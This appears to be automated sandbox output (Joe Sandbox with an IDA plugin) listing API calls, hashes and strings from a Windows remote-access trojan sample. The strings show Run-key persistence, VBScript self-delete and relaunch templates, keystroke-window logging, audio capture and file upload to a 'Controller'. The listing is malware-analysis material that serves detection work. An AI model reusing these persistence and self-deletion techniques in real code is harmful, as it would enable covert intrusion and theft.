                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00416F91
                                • GetIconInfo.USER32(?,?), ref: 00416FC5
                                • DeleteObject.GDI32(?), ref: 00416FF4
                                • DeleteObject.GDI32(?), ref: 00417001
                                • DrawIcon.USER32(00000000,?,?,?), ref: 0041700E
                                • GetObjectA.GDI32(00000000,00000018,?), ref: 00417026
                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 00417095
                                • GlobalAlloc.KERNEL32(00000000,?), ref: 00417104
                                • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00417128
                                • DeleteDC.GDI32(?), ref: 0041713C
                                • DeleteDC.GDI32(00000000), ref: 0041713F
                                • DeleteObject.GDI32(00000000), ref: 00417142
                                • GlobalFree.KERNEL32(?), ref: 0041714D
                                • DeleteObject.GDI32(00000000), ref: 00417201
                                • GlobalFree.KERNEL32(?), ref: 00417208
                                • DeleteDC.GDI32(?), ref: 00417218
                                • DeleteDC.GDI32(00000000), ref: 00417223
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                • String ID: DISPLAY
                                • API String ID: 479521175-865373369
                                • Opcode ID: 1a3d4f3de887f4170ad339b02c00c27acc1d1d199adb59c50c414d62b5943ebe
                                • Instruction ID: 4ba325f74191387ade15767708145f982ef5b1c7ca4df498548f130554e7309d
                                • Opcode Fuzzy Hash: 1a3d4f3de887f4170ad339b02c00c27acc1d1d199adb59c50c414d62b5943ebe
                                • Instruction Fuzzy Hash: 6FB16A315083009FD720DF24DC44BABBBE9EF88755F41482EF98993291DB38E945CB5A
                                APIs
                                  • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
                                  • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C0D6
                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C0E9
                                • SetFileAttributesW.KERNEL32(?,00000080), ref: 0040C102
                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040C132
                                  • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(00409305,00000000,004721E8,0040BC76,?,00472200,pth_unenc,004721E8), ref: 0040A801
                                  • Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(?), ref: 0040A811
                                  • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,004721E8), ref: 0040A823
                                  • Part of subcall function 0041A17B: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C37D
                                • ExitProcess.KERNEL32 ref: 0040C389
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$t<F$wend$while fso.FileExists("
                                • API String ID: 1861856835-1953526029
                                • Opcode ID: 10d0c7ff4f1d806eef4ddcd080fba36a068473baf966d624ed17e78b73616814
                                • Instruction ID: 20f5f97700cb48a3d0b4a42ff25d793d854bdbfc6fb2dd54058f707cc559a17d
                                • Opcode Fuzzy Hash: 10d0c7ff4f1d806eef4ddcd080fba36a068473baf966d624ed17e78b73616814
                                • Instruction Fuzzy Hash: 579180712042405AC314FB62D8929EF77E99F90708F50453FB586B31E3EE789E49C69E
                                APIs
                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,00472200,00471FFC,00000000), ref: 00410EF9
                                • ExitProcess.KERNEL32(00000000), ref: 00410F05
                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00410F7F
                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00410F8E
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00410F99
                                • CloseHandle.KERNEL32(00000000), ref: 00410FA0
                                • GetCurrentProcessId.KERNEL32 ref: 00410FA6
                                • PathFileExistsW.SHLWAPI(?), ref: 00410FD7
                                • GetTempPathW.KERNEL32(00000104,?), ref: 0041103A
                                • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 00411054
                                • lstrcatW.KERNEL32(?,.exe), ref: 00411066
                                  • Part of subcall function 0041A17B: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA
                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004110A6
                                • Sleep.KERNEL32(000001F4), ref: 004110E7
                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004110FC
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00411107
                                • CloseHandle.KERNEL32(00000000), ref: 0041110E
                                • GetCurrentProcessId.KERNEL32 ref: 00411114
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                • String ID: (#G$.exe$H"G$WDH$exepath$open$temp_
                                • API String ID: 2649220323-71629269
                                • Opcode ID: 2d259c07ed95d09e60fa5efe04e2d1ca5b77bcbd3679d1c800de5877fac34894
                                • Instruction ID: 69aa2ac3f34532c799e46254488c9bc95b38e37df126af38d98eea17990f3aaa
                                • Opcode Fuzzy Hash: 2d259c07ed95d09e60fa5efe04e2d1ca5b77bcbd3679d1c800de5877fac34894
                                • Instruction Fuzzy Hash: 9D51A671A003196BDF10A7A09C59EEE336D9B04715F5041BBF605A31E2EFBC8E86875D
                                APIs
                                  • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
                                  • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BD63
                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040BD76
                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BDA6
                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BDB5
                                  • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(00409305,00000000,004721E8,0040BC76,?,00472200,pth_unenc,004721E8), ref: 0040A801
                                  • Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(?), ref: 0040A811
                                  • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,004721E8), ref: 0040A823
                                  • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BFD0
                                • ExitProcess.KERNEL32 ref: 0040BFD7
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                • String ID: ")$.vbs$05Mw`Mw$H"G$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                • API String ID: 3797177996-3625296328
                                • Opcode ID: 631efead2f1a7aa74ba651dc5d5e4e8b052369c469df6eda5620e8cdf42f0076
                                • Instruction ID: 6c8f8b33712d81dc7036d24bc004af62d002185c7e194acf753e7914dc64dab3
                                • Opcode Fuzzy Hash: 631efead2f1a7aa74ba651dc5d5e4e8b052369c469df6eda5620e8cdf42f0076
                                • Instruction Fuzzy Hash: DD816E716042405AC714FB62D8929EF77A8AF90708F10443FF586A71E2EF789E49C69E
                                APIs
                                • _wcslen.LIBCMT ref: 0040B882
                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B89B
                                • CopyFileW.KERNEL32(0046FB08,00000000,00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B952
                                • _wcslen.LIBCMT ref: 0040B968
                                • CopyFileW.KERNEL32(0046FB08,00000000,00000000,00000000), ref: 0040B9E0
                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA22
                                • _wcslen.LIBCMT ref: 0040BA25
                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA3C
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BC2A
                                • ExitProcess.KERNEL32 ref: 0040BC36
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$_wcslen$AttributesCopy$CreateDirectoryExecuteExitProcessShell
                                • String ID: """, 0$6$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open$!G$!G
                                • API String ID: 2743683619-2376316431
                                • Opcode ID: 2d8f1c55d0f0c7d88b14490434e7e409f023ec492faccedf176980d1ad0b2fd8
                                • Instruction ID: 1f37921bc36cc04280d9be7a1af933bc03f5727a4608831148a2c1203a4a5f71
                                • Opcode Fuzzy Hash: 2d8f1c55d0f0c7d88b14490434e7e409f023ec492faccedf176980d1ad0b2fd8
                                • Instruction Fuzzy Hash: CA9161712083415BC218F766DC92EAF77D8AF90708F50043FF546A61E2EE7C9A49C69E
                                APIs
                                • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 004190F2
                                • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00419106
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00463050), ref: 0041912E
                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00471E78,00000000), ref: 00419144
                                • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00419185
                                • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041919D
                                • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 004191B2
                                • SetEvent.KERNEL32 ref: 004191CF
                                • WaitForSingleObject.KERNEL32(000001F4), ref: 004191E0
                                • CloseHandle.KERNEL32 ref: 004191F0
                                • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00419212
                                • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041921C
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                • API String ID: 738084811-1354618412
                                • Opcode ID: 86fd4772b83d80fa8e497525ba6a2bc9e4fac7079830c2c2d6cb57e0af13d410
                                • Instruction ID: 6660e32d934ed13bda46fa62e77153e47455c80990ba371f4f5bcee5a70a39dd
                                • Opcode Fuzzy Hash: 86fd4772b83d80fa8e497525ba6a2bc9e4fac7079830c2c2d6cb57e0af13d410
                                • Instruction Fuzzy Hash: 6C5191712043056BD604FB75DC96EBF369CDB81398F10053FF44A621E2EE789D898A6E
                                APIs
                                • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                                • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401AE3
                                • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401AF3
                                • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B03
                                • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B13
                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B23
                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B34
                                • WriteFile.KERNEL32(00000000,0046FA9A,00000002,00000000,00000000), ref: 00401B45
                                • WriteFile.KERNEL32(00000000,0046FA9C,00000004,00000000,00000000), ref: 00401B55
                                • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B65
                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B76
                                • WriteFile.KERNEL32(00000000,0046FAA6,00000002,00000000,00000000), ref: 00401B87
                                • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401B97
                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BA7
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Write$Create
                                • String ID: RIFF$WAVE$data$fmt
                                • API String ID: 1602526932-4212202414
                                • Opcode ID: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
                                • Instruction ID: fa9573d22dfebaa7cc70b9682dc8642ba3498ee27ac2ec60dc87a96e6c13d219
                                • Opcode Fuzzy Hash: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
                                • Instruction Fuzzy Hash: 46416F726543197AE210DB91DD85FBB7EECEB85B50F40042AF648D6080E7A4E909DBB3
                                APIs
                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0041382B
                                • LoadLibraryA.KERNEL32(?), ref: 0041386D
                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0041388D
                                • FreeLibrary.KERNEL32(00000000), ref: 00413894
                                • LoadLibraryA.KERNEL32(?), ref: 004138CC
                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004138DE
                                • FreeLibrary.KERNEL32(00000000), ref: 004138E5
                                • GetProcAddress.KERNEL32(00000000,?), ref: 004138F4
                                • FreeLibrary.KERNEL32(00000000), ref: 0041390B
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                • String ID: \ws2_32$\wship6$`3A$freeaddrinfo$getaddrinfo$getnameinfo
                                • API String ID: 2490988753-3443138237
                                • Opcode ID: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
                                • Instruction ID: d28fd91e0c22c3548fe93de424e57890752fc739e59a71d3c7449bb4191d4936
                                • Opcode Fuzzy Hash: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
                                • Instruction Fuzzy Hash: 8831C0B2502315ABC720AF25DC489CBBBEC9F48755F41062AF84593251E7B8CE8486AE
                                APIs
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$EnvironmentVariable$_wcschr
                                • String ID:
                                • API String ID: 3899193279-0
                                • Opcode ID: 684045cb82c272c6e2ac36361ff8b964f23035e186c2d5dbd227a350b29f8928
                                • Instruction ID: f90cfe9d57a3c7213274ca364bab7ea13f4483d5bd7e80e8c07ab134bc70d503
                                • Opcode Fuzzy Hash: 684045cb82c272c6e2ac36361ff8b964f23035e186c2d5dbd227a350b29f8928
                                • Instruction Fuzzy Hash: 80D136719023007BFB60AF7598C166B7BA4AF15718F09817FF985A7381FB3989008B5D
                                APIs
                                • ___free_lconv_mon.LIBCMT ref: 0044E4EA
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D6FF
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D711
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D723
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D735
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D747
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D759
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D76B
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D77D
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D78F
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7A1
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7B3
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7C5
                                  • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7D7
                                • _free.LIBCMT ref: 0044E4DF
                                  • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                  • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                • _free.LIBCMT ref: 0044E501
                                • _free.LIBCMT ref: 0044E516
                                • _free.LIBCMT ref: 0044E521
                                • _free.LIBCMT ref: 0044E543
                                • _free.LIBCMT ref: 0044E556
                                • _free.LIBCMT ref: 0044E564
                                • _free.LIBCMT ref: 0044E56F
                                • _free.LIBCMT ref: 0044E5A7
                                • _free.LIBCMT ref: 0044E5AE
                                • _free.LIBCMT ref: 0044E5CB
                                • _free.LIBCMT ref: 0044E5E3
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                • String ID: pF
                                • API String ID: 161543041-2973420481
                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004118B2
                                  • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980
                                  • Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
                                  • Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5
                                • Sleep.KERNEL32(0000000A,00462E24), ref: 00411A01
                                • Sleep.KERNEL32(0000000A,00462E24,00462E24), ref: 00411AA3
                                • Sleep.KERNEL32(0000000A,00462E24,00462E24,00462E24), ref: 00411B42
                                • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411B9F
                                • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411BCF
                                • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411C05
                                • Sleep.KERNEL32(000001F4,00462E24,00462E24,00462E24), ref: 00411C25
                                • Sleep.KERNEL32(00000064), ref: 00411C63
                                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                Strings
                                • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                • String ID: /stext "$$.F$@#G$@#G
                                • API String ID: 1223786279-2596709126
                                APIs
                                Strings
                                • API ID: _free
                                • String ID: pF
                                • API String ID: 269201875-2973420481
                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00472248,00471FFC,?,00000001), ref: 0040DE4E
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000001), ref: 0040DE79
                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040DE95
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040DF14
                                • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000001), ref: 0040DF23
                                  • Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C
                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001), ref: 0040E047
                                • CloseHandle.KERNEL32(00000000,C:\Program Files(x86)\Internet Explorer\,?,00000001), ref: 0040E133
                                Strings
                                • API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
                                • String ID: 0"G$C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$!G
                                • API String ID: 193334293-3226144251
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041A43B
                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041A47F
                                • RegCloseKey.ADVAPI32(?), ref: 0041A749
                                Strings
                                • API ID: CloseEnumOpen
                                • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                • API String ID: 1332880857-3714951968
                                APIs
                                • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041B38F
                                • GetCursorPos.USER32(?), ref: 0041B39E
                                • SetForegroundWindow.USER32(?), ref: 0041B3A7
                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041B3C1
                                • Shell_NotifyIconA.SHELL32(00000002,00471AE0), ref: 0041B412
                                • ExitProcess.KERNEL32 ref: 0041B41A
                                • CreatePopupMenu.USER32 ref: 0041B420
                                • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041B435
                                Strings
                                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                • String ID: Close
                                • API String ID: 1657328048-3535843008
                                APIs
                                • API ID: _free$Info
                                • String ID:
                                • API String ID: 2509303402-0
                                APIs
                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407D1F
                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 00407D57
                                • __aulldiv.LIBCMT ref: 00407D89
                                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                  • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00407EAC
                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00407EC7
                                • CloseHandle.KERNEL32(00000000), ref: 00407FA0
                                • CloseHandle.KERNEL32(00000000,00000052), ref: 00407FEA
                                • CloseHandle.KERNEL32(00000000), ref: 00408038
                                Strings
                                • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                                • API String ID: 3086580692-2596673759
                                APIs
                                  • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
                                  • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8
                                  • Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
                                  • Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
                                  • Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C412
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C571
                                • ExitProcess.KERNEL32 ref: 0040C57D
                                Strings
                                • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$Temp$exepath$open
                                • API String ID: 1913171305-2600661426
                                APIs
                                • connect.WS2_32(?,?,?), ref: 004048C0
                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049E0
                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049EE
                                • WSAGetLastError.WS2_32 ref: 00404A01
                                  • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                Strings
                                • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                • API String ID: 994465650-2151626615
                                APIs
                                  • Part of subcall function 00452A89: CreateFileW.KERNEL32(?,00000008,00000007,d.E,?,?,00000000,?,00452E64,00000000,0000000C), ref: 00452AA6
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452ECF
                                • __dosmaperr.LIBCMT ref: 00452ED6
                                • GetFileType.KERNEL32(00000000), ref: 00452EE2
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452EEC
                                • __dosmaperr.LIBCMT ref: 00452EF5
                                • CloseHandle.KERNEL32(00000000), ref: 00452F15
                                • CloseHandle.KERNEL32(00000000), ref: 0045305F
                                • GetLastError.KERNEL32 ref: 00453091
                                • __dosmaperr.LIBCMT ref: 00453098
                                Strings
                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                • String ID: H
                                • API String ID: 4237864984-2852464175
                                Strings
                                • API ID:
                                • String ID: 65535$udp
                                • API String ID: 0-1267037602
                                APIs
                                • __Init_thread_footer.LIBCMT ref: 00409C81
                                • Sleep.KERNEL32(000001F4), ref: 00409C8C
                                • GetForegroundWindow.USER32 ref: 00409C92
                                • GetWindowTextLengthW.USER32(00000000), ref: 00409C9B
                                • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 00409CCF
                                • Sleep.KERNEL32(000003E8), ref: 00409D9D
                                  • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A
                                Strings
                                • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                • String ID: [${ User has been idle for $ minutes }$]
                                • API String ID: 911427763-3954389425
                                APIs
                                • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040C753
                                Strings
                                • API ID: LongNamePath
                                • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                • API String ID: 82841172-425784914
                                APIs
                                Strings
                                • API ID: _free
                                • String ID: pF$tF
                                • API String ID: 269201875-2954683558
                                APIs
                                • Sleep.KERNEL32(00001388), ref: 00409738
                                  • Part of subcall function 0040966D: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
                                  • Part of subcall function 0040966D: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
